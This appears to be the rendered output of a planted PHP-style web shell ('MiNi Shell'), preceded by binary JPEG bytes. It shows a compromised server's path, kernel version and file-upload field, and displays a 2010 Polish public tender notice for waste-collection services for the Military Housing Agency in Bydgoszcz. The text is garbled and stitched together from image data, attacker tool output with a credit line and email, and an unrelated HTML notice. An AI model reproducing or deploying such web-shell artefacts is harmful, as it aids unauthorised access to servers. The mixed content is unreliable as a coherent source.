JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100406/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100406/94556-N-2010.html

<p class="kh_header"><b>Bydgoszcz: USŁUGI WYWOZU ODPADÓW KOMUNALNYCH W REJONIE DZIAŁANIA ODDZIAŁU REGIONALNEGO WOJSKOWEJ AGENCJI MIESZKANIOWEJ W BYDGOSZCZY</b><br>
<b>Numer ogłoszenia: 94556 - 2010; data zamieszczenia: 06.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Oddział Regionalny Wojskowej Agencji Mieszkaniowej , ul. Gdańska 163a, 85-915 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3782300, faks 0-52 378 28 91.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wam.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojskowa Agencja Mieszkaniowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI WYWOZU ODPADÓW KOMUNALNYCH W REJONIE DZIAŁANIA ODDZIAŁU REGIONALNEGO WOJSKOWEJ AGENCJI MIESZKANIOWEJ W BYDGOSZCZY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia -CPV 90.51.32.00-8 - usługi wywozu stałych odpadów miejskich

Przedmiotem zamówienia jest wywóz odpadów komunalnych i segregowanych stałych pochodzących z nieruchomości stanowiących zasób Oddziału Regionalnego WAM Bydgoszcz 

1.	Zakres usług przewidzianych do wykonania obejmuje:
1.odbiór i wywóz do miejsc przeznaczenia miejsc utylizacji, składowania, powtórnego wykorzystania wszelkich odpadów komunalnych pochodzących z budynków stanowiących zasób Zamawiającego, gromadzonych w osłonach altanach śmietnikowych, wokół osłon altan oraz w innych miejscach i pomieszczeniach wskazanych przez Zamawiającego,
2.	odbiór i wywóz odpadów pochodzących z selektywnej zbiórki i segregacji odpadów, jeśli zaistnieje taka potrzeba,
3.	nieodpłatne wyposażenie i dostarczenie na posesje kontenerów i pojemników wraz z pokrywami do gromadzenia odpadów stałych w ilościach określonych przez Zamawiającego,
4.	nieodpłatne dostarczenie na posesje lub wskazane miejsca w jej otoczeniu, odpowiedniej ilości pojemników do selektywnej zbiórki i segregacji odpadów papier, szkło, plastik oraz ich wywóz każdorazowo po napełnieniu.
UWAGA:  wszelkie koszty związane z wywozem pojemników do selektywnej  
      zbiórki odpadów należy wkalkulować w oferowaną cenę jednostkową wywozu  
       odpadów  niesegregowanych.  
5.odstawienie opróżnionych pojemników i kontenerów na miejsce ich lokalizacji,
6.uprzątnięcie odpadów luzem, które wysypały się podczas ładowania lub w wyniku opóźnionego wywozu czy przepełnienia pojemnika lub kontenera, 
7.wymianę na własny koszt zniszczonego pojemnika lub kontenera, 
8.utrzymanie czystości zewnętrznej pojemników, kontenerów oraz sprawności technicznej zamknięć klap zamykających,
9.mycie i dezynfekcję pojemników i kontenerów w tym przynajmniej raz w miesiącu w okresie od lipca do października,
10.wywóz odpadów wielkogabarytowych - w terminie uzgodnionym z Zamawiającym.





UWAGA : Ustalona częstotliwość wywozu, bądź ilość pojemników  może ulec  
                  zmniejszeniu, w zależności od potrzeb Zamawiającego.
                  Zmiana ceny jednostkowej za wywóz 1 pojemnika zawartej w umowie będzie możliwa tylko w przypadku wzrostu stawek opłat za korzystanie ze          
                  środowiska wprowadzonych Rozporządzeniem Rady Ministrów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających, w wysokości 20% wartości zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Wykonawcą określa się osobę fizyczną, osobę prawną albo jednostkę organizacyjną, nie posiadającą osobowości prawnej, która ubiega się o udzielenie zamówienia publicznego, złożyła ofertę lub zawarła umowę w sprawie zamówienia publicznego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy wykonawca zobowiązany jest złożyć:

1.1.Oświadczenie o spełnianiu warunków udziału w postępowaniu-załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.1.	Posiadania wiedzy i doświadczenia; opis sposobu dokonywania oceny spełnienia tego warunku:                                                                                                                    Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie wykonał lub wykonuje należycie, co najmniej jedną usługę polegająca na wywozie odpadów z nieruchomości, trwająca nieprzerwanie przez okres co najmniej 1 roku na kwotę:
1.	dla zadania nr 1 nie mniejszą niż     30 000,00zł
2.	dla zadania nr 2 nie mniejszą niż     15 000,00zł
3.	dla zadania nr 3 nie mniejsza niż     20 000,00zł
4.	dla zadania nr 4 nie mniejszą niż     90 000,00zł
5.	dla zadania nr 5 nie mniejszą niż     13 000,00zł
6.	dla zadania nr 6 nie mniejsza niż       2 000,00zł
7.	dla zadania nr 7 nie mniejszą niż       5 000,00zł                               6
8.	dla zadania nr 8 nie mniejszą niż       2 000,00zł
9.	dla zadania nr 9 nie mniejszą niż     13 000,00zł
10.	dla zadania nr 10 nie mniejszą niż   13 000,00zł
11.	dla zadania nr 11 nie mniejszą niż   36 000,00zł
12.	dla zadania nr 12 nie mniejszą niż     8 000,00zł
13.	dla zadania nr 13 nie mniejsza niż     5 000,00zł</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 20 000,00 złotych,
Kserokopia polisy OC.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. 	Zakres świadczenia wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie. 
2. 	Umowa jest nieważna w części wykraczającej poza określenie przedmiotu zamówienia zawarte w specyfikacji istotnych warunków zamówienia.  
3. Wykonawcy, składający ofertę wspólnie, ponoszą solidarną odpowiedzialność za wykonanie umowy.
4. 	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy.
5. 	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości 
o tych okolicznościach. W takim przypadku wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.
6. 	Wzór umowy stanowi zał. Nr 2 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wam.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego pok.107 w godz.od 8.00 do 14.00 od poniedziałku do piatku nr tel. faks 52 52 57 866.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2010 godzina 09:45, miejsce: Siedziba Zamawiającego pok. 108 biuro podawcze lub 206 kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Bydgoszcz, Bożenkowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bożenkowo 
	Częstotliwość wywozu 1 x w tygodniu  3 poj.PA1100
1.	Osiedlowa 9 Budynek mieszkalny	
2.	Osiedlowa 7 Budynek mieszkalny		
3.	Osiedlowa 5 Budynek mieszkalny		
4.	Osiedlowa 3 Budynek mieszkalny		


Budynki w Bydgoszczy 
Lp.	adres	Ilość pojemników	Częstotliwość wywozu
1	Sułkowskiego 52
Budynek internatowy	2 poj. PA1100
	1 x w tygodniu 

2	Chłodzińskiego 5
Budynek internatowy	1 poj. PA1100	 1 x w tygodniu 
3	Gdańska 147
Budynek internatowy	1 poj. PA 1100	1 x w tygodniu
4	Gdańska 163a
Budynek administracyjny	1 poj. PA 1100	2 x w tygodniu
5	11 Listopada 8
Lokal użytkowy	1 poj. PA1100	2 x w tygodniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2 - wywóz odpadów komunalnych z budynku w Łodzi ul. Brzeźna 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ul. Brzeźna 3 Lokale użytkowe częstotliwość wywożenia	 1 poj. K-7 3 x w miesiącu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3-  wywóz odpadów komunalnych z budynków mieszkalnych w Kutnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> częstotliwość wywożenia 1 poj. FLD-5 1x w tygodniu

1.	Boh.Walk nad Bzurą 6 Budynek mieszkalny	
2.	Boh.Walk nad Bzurą 8 Budynek mieszkalny		
3.	Boh.Walk nad Bzurą 10 Budynek mieszkalny		
4.	Boh.Walk nad Bzurą 12 Budynek mieszkalny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Leźnica Wielka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Leźnica Wielka budynku mieszkalne 30 pojemników PA1100 1 x w tygodniu
Blok nr 3
Blok nr 4                      
Blok nr 5                      
Blok nr 6                     
Blok nr 7                      
Blok nr 8                     
Blok nr 12                   
Blok nr 13                 
Blok nr 14                   
Blok nr 15                   
Blok nr 16                 
Blok nr 17                   
Blok nr 21 
Blok nr 24 
Blok nr 29
Blok nr 30                   
Blok nr 31                      
Blok nr 36 
20.	Blok nr 9  Budynek Garaże 1-32, 1 pojemnik PA1100 1 x na 2 tygodnie
21..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Łask ul. Wróblewskiego 4, ul. Kosynierów 2, ul. Jana Pawła II 44.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ul. Wróblewskiego 4 Budynek mieszkalny	2 poj.PA1100	1 x w tygodniu

ul. Kosynierów 2 Budynek internatowy	             1 poj. PA 1100      1 x w tygodniu

Jana Pawła II 44 Budynek mieszkalny	              2 poj.PA1100       1 x w tygodniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Regny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> budynki mieszkalne 2 poj. PA1100	1 x na dwa tygodnie
Blok nr 117                 Budynek mieszkalny
Blok nr 124                 Budynek mieszkalny
Blok nr 125                 Budynek mieszkalny
Blok nr 129                 Budynek mieszkalny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Gałków Mały.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budynki mieszkalne  2 poj.PA1100	1 x w  tygodniu
Ul. Wojska Polskiego 8 
ul. Wojska Polskiego 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Brodnica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budynek internatowy 2 poj. MGB 240 	1 x w tygodniu
ul. Sienkiewicza 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Piła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budynek administracyjny lokale użytkowe 1 Poj. PA1100	2 x w tygodniu
ul. Okrzei 18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Chełmno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ul. 3-go Maja 8
Budynek internatowy
            	1 poj. KP-7	2 x w miesiącu
 lub 	1 poj. PA 1100	1 x w tygodniu

ul. Polna 41 Budynek mieszkalny
              1 poj.KP-7	3 x w miesiącu
lub 	2 poj. PA 1100 	2 x w tygodniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Toruń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ul. Iwanowska 1,3,5,7  Budynki mieszklane       2 poj. PA1100	2 x w tygodniu
ul. Drzymały 17           Budynek mieszkalny	2 poj. MGB-240	1 x w tygodniu
ul. Okólna 26                  Budynek mieszkalny  	1 poj. SM-110	1 x w tygodniu
ul. Podgórska 14F  i 14G   Budynki mieszkalne  	3 poj. PA1100	2 x w tygodniu
ul. Poznańska 59 Lokale użytkowe	             1 poj. PA1100	1 x w tygodniu
ul. Jęczmienna 4 Budynek administracyjny	1 poj. PA 1100	1 x w tygodniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Grudziądz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ul. Chełmińska 106 budynek internatowy  1 poj. PA 1100	2 x w tygodniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Inowrocław.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ul. Błonie 6 budynek mieszkalny 2 poj. PA 1100	1 x w tygodniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com